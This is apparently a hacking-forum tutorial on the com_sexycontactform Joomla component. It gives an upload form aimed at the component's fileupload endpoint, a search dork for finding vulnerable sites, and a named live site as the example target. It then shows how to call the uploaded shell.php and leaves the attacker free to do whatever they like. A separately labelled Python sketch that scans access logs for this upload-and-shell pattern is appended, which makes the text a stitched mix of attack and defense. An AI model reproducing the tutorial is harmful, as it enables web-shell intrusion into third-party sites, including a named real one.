Exploit com_sexycontactform CSRF File Upload

This time we will share a tutorial on com_sexycontactform, so let's get straight to it!

1. A PC, of course
2. The CSRF script


<form method="POST" action="http://target.com/components/com_sexycontactform/fileupload/index.php"
      enctype="multipart/form-data">
  <input type="file" name="files[]" /><button>Upload</button>
</form>

3. Shell Backdoor
4. Dork inurl:/components/com_sexycontactform/
5. Exploit : components/com_sexycontactform/fileupload/index.php
 
Example:
Live target:
http://www.brinworks.com.ar/components/com_sexycontactform/fileupload/index.php 


After that, copy the link of that target into the CSRF script from earlier!

So it looks like this:
<form method="POST" action="http://www.brinworks.com.ar/components/com_sexycontactform/fileupload/index.php"
      enctype="multipart/form-data">
  <input type="file" name="files[]" /><button>Upload</button>
</form>

Once that is done, open the CSRF script; it will look like this:

After the shell has been uploaded successfully, we call the shell:
http://www.target.com/components/com_sexycontactform/fileupload/files/shell.php


So it becomes: http://www.brinworks.com.ar/components/com_sexycontactform/fileupload/files/shell.php


Once the shell has been uploaded, it is up to you what to do with it ^_^
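The flow described above leaves two traces in a web server access log: a POST to fileupload/index.php, then a request for a script under fileupload/files/. The following detection sketch is an added example, not part of the original post; it assumes Apache/nginx "combined" log format, and the sample log lines (documentation IP ranges) are constructed.

```python
import re
from urllib.parse import unquote

UPLOAD_PATH = "/components/com_sexycontactform/fileupload/index.php"
FILES_DIR = "/components/com_sexycontactform/fileupload/files/"
# Server-side script extensions that should never be served from an upload directory.
SCRIPT_EXT = re.compile(r"\.(php\d?|phtml|phar|pht)$", re.IGNORECASE)
# Combined log format: ip ident user [time] "METHOD url proto" status size ...
LINE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) [^"]*" (\d{3}) ')

# Constructed sample input, not taken from any real server.
SAMPLE_LOG = [
    '203.0.113.7 - - [10/Jan/2024:10:00:01 +0000] "GET /index.php HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
    '203.0.113.7 - - [10/Jan/2024:10:00:05 +0000] "POST /components/com_sexycontactform/fileupload/index.php HTTP/1.1" 200 312 "-" "Mozilla/5.0"',
    '203.0.113.7 - - [10/Jan/2024:10:00:09 +0000] "GET /components/com_sexycontactform/fileupload/files/shell.php HTTP/1.1" 200 980 "-" "Mozilla/5.0"',
    '198.51.100.4 - - [10/Jan/2024:10:02:00 +0000] "GET /components/com_sexycontactform/fileupload/files/photo.jpg HTTP/1.1" 200 20480 "-" "Mozilla/5.0"',
    '198.51.100.9 - - [10/Jan/2024:10:05:00 +0000] "GET /components/com_sexycontactform/fileupload/files/shell.php?x=1 HTTP/1.1" 200 980 "-" "curl/8.0"',
    '198.51.100.9 - - [10/Jan/2024:10:05:02 +0000] "GET /components/com_sexycontactform/fileupload/files/probe.php HTTP/1.1" 404 196 "-" "curl/8.0"',
]

def find_upload_abuse(lines):
    """Return (kind, ip, timestamp, path) for successful uploads and script fetches."""
    uploaders = set()   # client IPs that have POSTed to the upload endpoint
    findings = []
    for line in lines:
        m = LINE.match(line)
        if not m:
            continue
        ip, ts, method, url, status = m.groups()
        path = unquote(url.split("?", 1)[0])   # drop query string, decode %xx
        if not status.startswith("2"):
            continue                            # only successful requests
        if method == "POST" and path == UPLOAD_PATH:
            uploaders.add(ip)
            findings.append(("upload", ip, ts, path))
        elif path.startswith(FILES_DIR) and SCRIPT_EXT.search(path):
            kind = "shell-after-upload" if ip in uploaders else "script-in-upload-dir"
            findings.append((kind, ip, ts, path))
    return findings

if __name__ == "__main__":
    for finding in find_upload_abuse(SAMPLE_LOG):
        print(finding)
```

Any finding is a reason to inspect the fileupload/files/ directory on disk and to check whether the web server executes scripts from it.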

If it is still unclear, you can watch the video HERE!

That's all from me ^_^ I hope it is useful.
